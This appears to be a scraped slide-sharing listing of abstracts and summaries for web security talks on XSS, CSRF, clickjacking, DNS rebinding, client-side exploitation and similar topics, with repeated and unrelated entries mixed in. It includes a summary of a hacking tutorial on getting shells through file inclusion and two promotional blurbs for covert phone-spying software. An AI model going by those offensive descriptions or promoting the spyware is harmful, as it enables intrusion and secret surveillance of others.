video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
When you don't have 0days: client-side exploitation for the masses
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get
as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/
HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments.
The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit.
We'll show how to build a successful advanced UI-Redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizes. We'll work on file upload functionalities in current web applications and see how attackers might use HTML5 APIs for their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even the otherwise unexploitable vulnerabilities.
My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
EcmaScript5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
Electron is a framework to create the desktop application on Windows,OS X, Linux easily, and it has been used to develop the popular applications such as Atom Editor, Visual Studio Code, and Slack.
Although Electron includes Chromium and node.js and allow the web application developers to be able to develop the desktop application with accustomed methods, it contains a lot of security problems such as it allows arbitrary code execution if even one DOM-based XSS exist in the application. In fact, a lot of vulnerabilities which is able to load arbitrary code in applications made with Electron have been detected and reported.
In this talk, I focus on organize and understand the security problems which tend to occur on development using Electron.
--- Yosuke Hasegawa
Secure Sky Technology Inc, Technical Adviser. Known for finding numerous vulnerablities in Internet Explorer、Mozilla Firefox and other web applications.He has also presented at Black Hat Japan 2008, South Korea POC 2008, 2010 and others.
OWASP Kansai Chapter Leader, OWASP Japan Board member.
HTTP Security Headers Every Java Developer Must Know
Demonstration based session on HTTP headers relevant to security aspect of web applications. Target audience is web developers, and more attention is given to Java language.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
Protecting Java EE Web Apps with Secure HTTP Headers
This document summarizes techniques for securing Java EE web applications with secure HTTP headers. It discusses cross-site scripting (XSS) and how to prevent it using the HttpOnly and X-XSS-Protection headers. It also covers session hijacking and how to prevent it with the Secure and Strict-Transport-Security headers. Finally, it discusses clickjacking and demonstrates how it works.
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
This document discusses security considerations for using UIWebView on iOS. It recommends only loading trusted content, implementing input validation, and using features like Content Security Policy (CSP) to mitigate risks like cross-site scripting (XSS). The document provides code examples for implementing CSP and filtering untrusted content. It also warns that JavaScript bridges between UIWebView and native code need special attention from a security perspective.
Slides of my talk at RuxCon 2013:
For those who do not listen Mayhem and black metal, the talk title
might seem a bit weird, and I can't blame you.
You know the boundaries of the Same Origin Policy, you know SQL
injection and time-delays,
you know BeEF. You also know that when sending cross-domain XHRs you
can still monitor the timing of the response: you might want to infer
on 0 or 1 bits depending if the response was delayed or not.
This means it's possible to exploit every kind of SQL injection,
blind or not blind, through an hooked browser, if you can inject a
time-delay
and monitor the response timing.
You don't need a 0day or a particular SOP bypass to do this,
and it works in every browser.
The potential of being faster than a normal single-host multi-threaded SQLi
dumper will be explored. Two experiments will be shown: WebWorkers as well
as multiple synched hooked browsers, which split the workload
communicating
partial results to a central server.
A pure JavaScript approach will be exclusively presented during this talk,
including live demos. Such approach would work for both internet facing
targets as well as
applications available in the intranet of the hooked browser.
The talk will finish discussing the implications of such an approach
in terms of Incident Response and Forensics,
showing evidence of a very small footprint.
This document discusses various tools from the OWASP project for securing modern web applications, including ESAPI and the Java Encoder for output encoding, the Secure Headers Project for response headers, and CSRFGuard for cross-site request forgery protection. It emphasizes using security features like content security policies, strict transport security, and X-frame options headers to help mitigate risks like cross-site scripting and clickjacking attacks. The document also demonstrates cross-site request forgery vulnerabilities using the OWASP 1-Liner application and how to address them with anti-CSRF tokens.
This document discusses DNS rebinding attacks and defenses against them. DNS rebinding works by resolving a domain name to the attacker's IP address for a short time, then rebinding it to the target's IP. This allows the attacker to circumvent the same-origin policy and run code on the target's machine. Experiments showed the attack could recruit over 30,000 browsers to a botnet without any user interaction using Flash. Defenses include smarter pinning in browsers, host name authorization, and policy-based approaches. Plug-ins also need to consult server policies before opening sockets.
XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more.
This presentation:
1.Explain how XPC/NSXPC work
2.Present you some of my findings in popular macOS apps (e.g. local privilege escalation to r00t)
3.Abuse an interesting feature on Catalina allowing to inject an unsigned dylib
4.Show you how to fix that vulnz finally!
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
This document discusses security challenges with web applications that combine content from multiple sources (mashups). It covers how the same-origin policy isolates origins but exempts scripts, allowing cross-site scripting attacks. Frame-based communication and the postMessage API provide secure cross-origin messaging capabilities. The document recommends sandboxing iframes and using features like CORS to mitigate risks in mashups.
The WhiteHat Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address to avert attack. WhiteHat has been publishing the report, which highlights the top ten vulnerabilities, vertical market trends and new attack vectors, since 2006.
The WhiteHat report presents a statistical picture of current website vulnerabilities, accompanied by WhiteHat expert analysis and recommendations. WhiteHat’s report is the only one in the industry to focus solely on unknown vulnerabilities in custom Web applications, code unique to an organization, within real-world websites.
This document provides instructions for exploiting various web application vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), SQL injection, and more. It begins by explaining RFI and how to exploit it, including using a null byte bypass. It then covers LFI and how to escalate it to remote code execution (RCE). Other sections discuss uploading shells via LFI and Firefox, exploiting vulnerabilities to download local files, full path disclosure, SQL injection techniques, and automatically uploading a shell via a phpThumb() command injection vulnerability. The document aims to serve as a tutorial for hackers to learn various web hacking methods.
This document discusses HTML5 web messaging and the same origin policy. It introduces the MessageEvent object used to handle cross-document messaging and describes how to use the postMessage() method and MessageChannel interface to communicate across browsing contexts from different origins securely. Examples are given of using web messaging to extend the browser's capabilities by communicating between injected scripts, pages, and background processes.
Security Risk Management: ovvero come mitigare e gestire i rischi dei dati at...
Security Risk Management: ovvero come mitigare e gestire i rischi dei dati attraverso i servizi gestiti. - by Hitachi Systems - festival ICT 2015
Relatore: Denis Cassinerio
Security Business Unit Director di Hitachi Systems CBT
The document discusses various web application attacks like cross-site scripting, SQL injection, cross-site request forgery, sensitive data exposure, and cookie editing. For each attack, it provides information on threat agents, attack vectors, security weaknesses, impacts, prevalence, detectability, example exploits, and steps to prevent the attack. The overall document serves as an educational guide on common web hacking techniques and how to avoid falling victim to them.
This document discusses security issues related to Flash applications and cross-domain access. It covers how the crossdomain.xml file controls cross-domain access and demonstrates how this can be exploited. Attack surfaces like global parameters, external resources, and HTML text areas are described. The document recommends limiting JavaScript access in embedded Flash, ensuring configurations and external resources come from trusted domains, and sanitizing data in HTML text areas.
- The document summarizes a study of flash crowd dynamics in a peer-to-peer live video streaming system called Coolstreaming. It analyzes data collected during a flash crowd event when tens of thousands joined simultaneously.
- It finds the number of short sessions (under 2 minutes) increases significantly during a flash crowd, correlated with high joining rates. This suggests new peers struggle to start playback due to limited resources.
- User retry behavior is also analyzed, showing users try multiple times to join during a flash crowd. The system can scale up to a limit but with longer startup delays and potential disruptions during flash crowds.
The document discusses vulnerabilities in Adobe Flash and the risk of exploitation. It provides a history of Flash exploits from 2001-2008, noting common bugs like file format validation issues and input validation errors. It analyzes trends in Flash security advisories, finding that almost half of vulnerabilities allow remote code execution. The document warns that a Flash virus or worm is inevitable given the widespread use of Flash and continued emergence of vulnerabilities.
Mensajes de control y Error del conjunto TCP/IP - ICMP
El documento describe los mensajes de control y error del conjunto de protocolos TCP/IP. Explica que el protocolo ICMP se utiliza para enviar mensajes de error y control entre dispositivos de red, ya que IP por sí solo no garantiza la entrega de paquetes ni proporciona notificaciones de errores. Además, describe diversos tipos de mensajes ICMP como eco, redireccionamiento, marca de tiempo y destino inalcanzable, así como sus usos para diagnosticar problemas de comunicación en redes IP.
This document introduces Proxenet, a hacker-friendly web application proxy designed to be easily extensible through plugins. Proxenet is written entirely in C for high performance. It uses a microkernel approach where a small core handles connections and delegates all other functionality to plugins. Plugins are simple to create, requiring only request and response hook functions. The document demonstrates how Proxenet can be used for man-in-the-middle attacks by modifying HTTP traffic using plugins during active directory poisoning attacks on internal networks.
Este documento define los virus informáticos y describe sus características, efectos y clasificaciones. Los virus son programas dañinos que se ocultan, propagan e infectan otros ordenadores. Pueden consumir recursos, disminuir el rendimiento y destruir información. Existen varios tipos como caballos de Troya, camaleones, polimorfos y gusanos. Los virus son creados por hackers para causar daño. Se recomienda usar software antivirus y no ejecutar archivos sospechosos para prevenir infecciones.
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
El documento introduce los conceptos de malware y virus informáticos, describiendo sus características, clasificaciones, formas de propagación y daños. Explica los tipos de virus como boot sector, file, macro y encriptados, así como sus síntomas y etapas de contaminación. Finalmente, recomienda medidas de protección como software antivirus, firewalls e implementación de políticas de seguridad.
This document advertises 1TopSpy cell phone tracking software and describes its features for hacking into phones and monitoring activity. It claims the software can track location, read texts, messages on apps like WhatsApp and Facebook, and more across millions of phones. The summary provides instructions to download the software onto a target phone, login on a computer, and begin monitoring. Customer testimonials praise the software's usefulness for parenting and employee monitoring.
La seguridad de la información busca proteger los activos de una empresa o individuo, como la información, equipos y personas, mediante el resguardo de los principios de integridad, confidencialidad y disponibilidad de la información. Esto se logra identificando amenazas y vulnerabilidades, y aplicando medidas de seguridad como análisis de riesgos y políticas de seguridad.
This document provides information on open source intelligence (OSINT) techniques for information gathering. It discusses performing passive, semi-passive, and active information gathering. Key areas of focus are infrastructure intelligence gathering to identify networks and domains, and people/organization intelligence gathering to find emails, metadata in documents, and profiles of employees. A variety of tools are recommended to automate the process, including Maltego, theHarvester, FOCA, and APIs from services like Zoominfo.
This document describes how to use 1TopSpy software to hack and track any mobile phone within 5 minutes. It lists the features of 1TopSpy including tracking GPS location, monitoring text messages, calls, WhatsApp messages, and more. The summary describes downloading and installing 1TopSpy on the target phone, logging into the 1TopSpy website to begin monitoring. Customer testimonials praise 1TopSpy for allowing worried parents and businesses to discreetly monitor mobile activity.
Devfest istanbul'14 - Web Application Attacks and Trusting Frameworks
Frameworks are undeniably one of the most important elements of frameworks. As we continue to witness a significant increase in number of framework-based attacks towards web applications each day, usage of Frameworks without considering security-related aspects continue to be the most drastic problem that developers face. Throughout the presentation; Mr. İnce will analyze one of the most commonly-used PHP web frameworks by highlighting important security considerations; followed by a real-time exploitation of discovered vulnerability in LAB environment.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Rich Web App Security - Keeping your application safe
The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
Cross-Site Request Forgery (CSRF) is a major web vulnerability that forces users to perform unintended actions on websites. It remains underreported due to the difficulty of detection. CSRF can be used to hijack user accounts, modify browser settings, and force purchases without user awareness or consent. While solutions like tokens exist, many websites remain vulnerable to CSRF attacks.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in “securITy” Information Security Conference at BASIS SoftExpo 2012
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
Cross-Site Request Forgery (CSRF) is a type of malicious attack that tricks a user into unknowingly executing unwanted actions on a web application. The attacker creates hidden HTTP requests that get executed in the victim's browser using their authentication credentials. This allows the attacker to perform sensitive functions like changing passwords, making purchases, or posting comments on the victim's behalf. Defenses include using secret tokens or custom headers to validate requests and prevent CSRF attacks. The Firefox add-on CsFire also helps protect users by removing authentication information from cross-domain requests.
1) The document discusses new hacking techniques that can exploit browsers and access internal corporate networks even when the browser has JavaScript disabled or restricted. These techniques bypass traditional perimeter security measures.
2) One technique uses CSS to steal a user's browsing history without JavaScript. Another obtains the user's internal IP address using a Java applet and then port scans the internal network to find vulnerabilities.
3) The author concludes that a user's browser, when visiting public websites, can potentially be silently hijacked to target and hack resources on the internal corporate network.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
[CB16] Esoteric Web Application Vulnerabilities by Andrés RianchoCODE BLUE
This talk will show esoteric web application vulnerabilities in detail, these vulnerabilities would be missed in a quick review by most security consultants, but could lead to remote code execution, authentication bypass and purchasing items in merchants using Paypal as their payment gateway without actually paying. SQL injections are dead, and I don’t care: let's explore the world of null, nil and NULL; noSQL injections; host header injections that lead to phone call audio interception; paypal’s double spent and Rails’ MessageVerifier remote code execution.
--- Andres Riancho
Andrés Riancho is an application security expert that currently leads the community driven, Open Source, w3af project and provides in-depth Web Application Penetration Testing services to companies around the world.
In the research field, he discovered critical vulnerabilities in IPS appliances from 3com and ISS, contributed with SAP research performed at one of his former employers and reported vulnerabilities in hundreds of web applications.
His main focus has always been the Web Application Security field, in which he developed w3af, a Web Application Attack and Audit Framework used extensively by penetration testers and security consultants.
Andrés has spoken and hold trainings at many security conferences around the globe, like BlackHat (USA and Europe), SEC-T (Sweden),DeepSec (Austria), PHDays (Moscow), SecTor (Toronto), OWASP (Poland),CONFidence (Poland), OWASP World C0n (USA), CanSecWest (Canada),PacSecWest (Japan), T2 (Finland) and Ekoparty (Buenos Aires).
Andrés founded Bonsai Information Security, a web security focused consultancy firm, in 2009 in order to further research into automated Web Application Vulnerability detection and exploitation.
I'm in ur browser, pwning your stuff - Attacking (with) Google Chrome ExtensionsKrzysztof Kotowicz
This document discusses attacking Chrome extensions through exploiting vulnerabilities in their architecture and code. It begins by explaining the components and permissions model of Chrome extensions. It then describes how to exploit vulnerabilities like DOM XSS in extensions' UI pages under the legacy v1 model. The document outlines fixes made in the v2 model but still finds ways to bypass security restrictions, such as through content script XSS. It introduces tools like XSSChEF and Mosquito for exploiting extensions. The presentation concludes by noting CSP should only be seen as a mitigation rather than prevention for extension vulnerabilities.
When you don't have 0days: client-side exploitation for the massesMichele Orru
Conference: InsomniHack (21 March 2014)
Talk speakers:
Michele Orru (@antisnatchor)
Krzysztof Kotowicz (@kkotowicz)
Talk abstract:
A bag of fresh and juicy 0days is certainly something you would love to get
as a Christmas present, but it would probably be just a dream you had one of those drunken nights.
Hold on! Not all is lost! There is still hope for pwning targets without 0days.
We will walk you through multiple real-life examples of client-side pwnage, from tricking the victim to take the bait, to achieving persistence on the compromised system.
The talk will be highly practical and will demonstrate how you can do proper client-side exploitation effectively, simply by abusing existing functionalities of browsers, extensions, legacy features, etc.
We'll delve into Chrome and Firefox extensions (automating various repetitive actions that you'll likely perform in your engagements), HTML applications, abusing User Interface expectations, (Open)Office macros and more. All the attacks are supposed to work on fully patched target software, with a bit of magic trickery as the secret ingredient.
You might already know some of these exploitation vectors, but you might need a way to automate your attacks and tailor them based on the victim language, browser, and whatnot. Either way, if you like offensive security, then this talk is for you.
Video recording of the talk: https://connect.ruhr-uni-bochum.de/p3g2butmrt4/
HTML5 is quickly gaining media attention and popularity among browser vendors and web developers. Having tremendous features, together with its sister specifications like Drag & Drop API, File API or Geolocation it allows developers to build rich web applications that easily blend with desktop & mobile environments.
The talk will be focused on finding the weakest link and combining several recent attack techniques to turn a security vulnerability into a successful exploit.
We'll show how to build a successful advanced UI-Redressing attack (also known as clickjacking), presenting the latest findings in this field, including malicious games and quizes. We'll work on file upload functionalities in current web applications and see how attackers might use HTML5 APIs for their advantage. Putting all these building blocks together will enable us to launch an attack and exploit even the otherwise unexploitable vulnerabilities.
My presentation from Framsia.
Topics:
XSS (reflected, stored, dom-based)
CSRF
Clickjacking
Header based approaches (CSP, X-frame-options)
EcmaScript5
HTML5
Some slides borrowed from John Wilander http://www.slideshare.net/johnwilander/application-security-for-rias
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...CODE BLUE
Electron is a framework to create the desktop application on Windows,OS X, Linux easily, and it has been used to develop the popular applications such as Atom Editor, Visual Studio Code, and Slack.
Although Electron includes Chromium and node.js and allow the web application developers to be able to develop the desktop application with accustomed methods, it contains a lot of security problems such as it allows arbitrary code execution if even one DOM-based XSS exist in the application. In fact, a lot of vulnerabilities which is able to load arbitrary code in applications made with Electron have been detected and reported.
In this talk, I focus on organize and understand the security problems which tend to occur on development using Electron.
--- Yosuke Hasegawa
Secure Sky Technology Inc, Technical Adviser. Known for finding numerous vulnerablities in Internet Explorer、Mozilla Firefox and other web applications.He has also presented at Black Hat Japan 2008, South Korea POC 2008, 2010 and others.
OWASP Kansai Chapter Leader, OWASP Japan Board member.
HTTP Security Headers Every Java Developer Must KnowAyoma Wijethunga
Demonstration based session on HTTP headers relevant to security aspect of web applications. Target audience is web developers, and more attention is given to Java language.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
Protecting Java EE Web Apps with Secure HTTP HeadersFrank Kim
This document summarizes techniques for securing Java EE web applications with secure HTTP headers. It discusses cross-site scripting (XSS) and how to prevent it using the HttpOnly and X-XSS-Protection headers. It also covers session hijacking and how to prevent it with the Secure and Strict-Transport-Security headers. Finally, it discusses clickjacking and demonstrates how it works.
Often, web developers keep hearing about "Same Origin Policy (SOP)" of browsers but live with half-knowledge or with several confusions. This session attempts to clear the misconceptions of SOP.
This document discusses security considerations for using UIWebView on iOS. It recommends only loading trusted content, implementing input validation, and using features like Content Security Policy (CSP) to mitigate risks like cross-site scripting (XSS). The document provides code examples for implementing CSP and filtering untrusted content. It also warns that JavaScript bridges between UIWebView and native code need special attention from a security perspective.
Slides of my talk at RuxCon 2013:
For those who do not listen Mayhem and black metal, the talk title
might seem a bit weird, and I can't blame you.
You know the boundaries of the Same Origin Policy, you know SQL
injection and time-delays,
you know BeEF. You also know that when sending cross-domain XHRs you
can still monitor the timing of the response: you might want to infer
on 0 or 1 bits depending if the response was delayed or not.
This means it's possible to exploit every kind of SQL injection,
blind or not blind, through an hooked browser, if you can inject a
time-delay
and monitor the response timing.
You don't need a 0day or a particular SOP bypass to do this,
and it works in every browser.
The potential of being faster than a normal single-host multi-threaded SQLi
dumper will be explored. Two experiments will be shown: WebWorkers as well
as multiple synched hooked browsers, which split the workload
communicating
partial results to a central server.
A pure JavaScript approach will be exclusively presented during this talk,
including live demos. Such approach would work for both internet facing
targets as well as
applications available in the intranet of the hooked browser.
The talk will finish discussing the implications of such an approach
in terms of Incident Response and Forensics,
showing evidence of a very small footprint.
This document discusses various tools from the OWASP project for securing modern web applications, including ESAPI and the Java Encoder for output encoding, the Secure Headers Project for response headers, and CSRFGuard for cross-site request forgery protection. It emphasizes using security features like content security policies, strict transport security, and X-frame options headers to help mitigate risks like cross-site scripting and clickjacking attacks. The document also demonstrates cross-site request forgery vulnerabilities using the OWASP 1-Liner application and how to address them with anti-CSRF tokens.
This document discusses DNS rebinding attacks and defenses against them. DNS rebinding works by resolving a domain name to the attacker's IP address for a short time, then rebinding it to the target's IP. This allows the attacker to circumvent the same-origin policy and run code on the target's machine. Experiments showed the attack could recruit over 30,000 browsers to a botnet without any user interaction using Flash. Defenses include smarter pinning in browsers, host name authorization, and policy-based approaches. Plug-ins also need to consult server policies before opening sockets.
XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more.
This presentation:
1.Explain how XPC/NSXPC work
2.Present you some of my findings in popular macOS apps (e.g. local privilege escalation to r00t)
3.Abuse an interesting feature on Catalina allowing to inject an unsigned dylib
4.Show you how to fix that vulnz finally!
The document provides an overview of secure web messaging in HTML5. It discusses how traditional methods of communication like JavaScript, AJAX, and frames had limitations due to the same-origin policy. The HTML5 postMessage API allows for secure cross-origin communication between frames by abstracting multiple principals. While more secure than previous techniques, the postMessage API still requires careful configuration of target origins, validation of received data, and mitigation of framing attacks to prevent security issues like cross-site scripting.
This document discusses security challenges with web applications that combine content from multiple sources (mashups). It covers how the same-origin policy isolates origins but exempts scripts, allowing cross-site scripting attacks. Frame-based communication and the postMessage API provide secure cross-origin messaging capabilities. The document recommends sandboxing iframes and using features like CORS to mitigate risks in mashups.
The WhiteHat Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address to avert attack. WhiteHat has been publishing the report, which highlights the top ten vulnerabilities, vertical market trends and new attack vectors, since 2006.
The WhiteHat report presents a statistical picture of current website vulnerabilities, accompanied by WhiteHat expert analysis and recommendations. WhiteHat’s report is the only one in the industry to focus solely on unknown vulnerabilities in custom Web applications, code unique to an organization, within real-world websites.
This document provides instructions for exploiting various web application vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), SQL injection, and more. It begins by explaining RFI and how to exploit it, including using a null byte bypass. It then covers LFI and how to escalate it to remote code execution (RCE). Other sections discuss uploading shells via LFI and Firefox, exploiting vulnerabilities to download local files, full path disclosure, SQL injection techniques, and automatically uploading a shell via a phpThumb() command injection vulnerability. The document aims to serve as a tutorial for hackers to learn various web hacking methods.
This document discusses HTML5 web messaging and the same origin policy. It introduces the MessageEvent object used to handle cross-document messaging and describes how to use the postMessage() method and MessageChannel interface to communicate across browsing contexts from different origins securely. Examples are given of using web messaging to extend the browser's capabilities by communicating between injected scripts, pages, and background processes.
Security Risk Management: ovvero come mitigare e gestire i rischi dei dati at...festival ICT 2016
Security Risk Management: ovvero come mitigare e gestire i rischi dei dati attraverso i servizi gestiti. - by Hitachi Systems - festival ICT 2015
Relatore: Denis Cassinerio
Security Business Unit Director di Hitachi Systems CBT
The document discusses various web application attacks like cross-site scripting, SQL injection, cross-site request forgery, sensitive data exposure, and cookie editing. For each attack, it provides information on threat agents, attack vectors, security weaknesses, impacts, prevalence, detectability, example exploits, and steps to prevent the attack. The overall document serves as an educational guide on common web hacking techniques and how to avoid falling victim to them.
This document discusses security issues related to Flash applications and cross-domain access. It covers how the crossdomain.xml file controls cross-domain access and demonstrates how this can be exploited. Attack surfaces like global parameters, external resources, and HTML text areas are described. The document recommends limiting JavaScript access in embedded Flash, ensuring configurations and external resources come from trusted domains, and sanitizing data in HTML text areas.
- The document summarizes a study of flash crowd dynamics in a peer-to-peer live video streaming system called Coolstreaming. It analyzes data collected during a flash crowd event when tens of thousands joined simultaneously.
- It finds the number of short sessions (under 2 minutes) increases significantly during a flash crowd, correlated with high joining rates. This suggests new peers struggle to start playback due to limited resources.
- User retry behavior is also analyzed, showing users try multiple times to join during a flash crowd. The system can scale up to a limit but with longer startup delays and potential disruptions during flash crowds.
The document discusses vulnerabilities in Adobe Flash and the risk of exploitation. It provides a history of Flash exploits from 2001-2008, noting common bugs like file format validation issues and input validation errors. It analyzes trends in Flash security advisories, finding that almost half of vulnerabilities allow remote code execution. The document warns that a Flash virus or worm is inevitable given the widespread use of Flash and continued emergence of vulnerabilities.
El documento describe los mensajes de control y error del conjunto de protocolos TCP/IP. Explica que el protocolo ICMP se utiliza para enviar mensajes de error y control entre dispositivos de red, ya que IP por sí solo no garantiza la entrega de paquetes ni proporciona notificaciones de errores. Además, describe diversos tipos de mensajes ICMP como eco, redireccionamiento, marca de tiempo y destino inalcanzable, así como sus usos para diagnosticar problemas de comunicación en redes IP.
This document introduces Proxenet, a hacker-friendly web application proxy designed to be easily extensible through plugins. Proxenet is written entirely in C for high performance. It uses a microkernel approach where a small core handles connections and delegates all other functionality to plugins. Plugins are simple to create, requiring only request and response hook functions. The document demonstrates how Proxenet can be used for man-in-the-middle attacks by modifying HTTP traffic using plugins during active directory poisoning attacks on internal networks.
Este documento define los virus informáticos y describe sus características, efectos y clasificaciones. Los virus son programas dañinos que se ocultan, propagan e infectan otros ordenadores. Pueden consumir recursos, disminuir el rendimiento y destruir información. Existen varios tipos como caballos de Troya, camaleones, polimorfos y gusanos. Los virus son creados por hackers para causar daño. Se recomienda usar software antivirus y no ejecutar archivos sospechosos para prevenir infecciones.
The top 10 security issues in web applicationsDevnology
The top 10 security issues in web applications are:
1. Injection flaws such as SQL, OS, and LDAP injection.
2. Cross-site scripting (XSS) vulnerabilities that allow attackers to execute scripts in a victim's browser.
3. Broken authentication and session management, such as not logging users out properly or exposing session IDs.
4. Insecure direct object references where users can directly access files without authorization checks.
5. Cross-site request forgery (CSRF) that tricks a user into performing actions they did not intend.
6. Security misconfiguration of web or application servers.
7. Insecure cryptographic storage of passwords or sensitive data.
8
El documento introduce los conceptos de malware y virus informáticos, describiendo sus características, clasificaciones, formas de propagación y daños. Explica los tipos de virus como boot sector, file, macro y encriptados, así como sus síntomas y etapas de contaminación. Finalmente, recomienda medidas de protección como software antivirus, firewalls e implementación de políticas de seguridad.
This document advertises 1TopSpy cell phone tracking software and describes its features for hacking into phones and monitoring activity. It claims the software can track location, read texts, messages on apps like WhatsApp and Facebook, and more across millions of phones. The summary provides instructions to download the software onto a target phone, login on a computer, and begin monitoring. Customer testimonials praise the software's usefulness for parenting and employee monitoring.
La seguridad de la información busca proteger los activos de una empresa o individuo, como la información, equipos y personas, mediante el resguardo de los principios de integridad, confidencialidad y disponibilidad de la información. Esto se logra identificando amenazas y vulnerabilidades, y aplicando medidas de seguridad como análisis de riesgos y políticas de seguridad.
Open Source Information Gathering Brucon EditionChris Gates
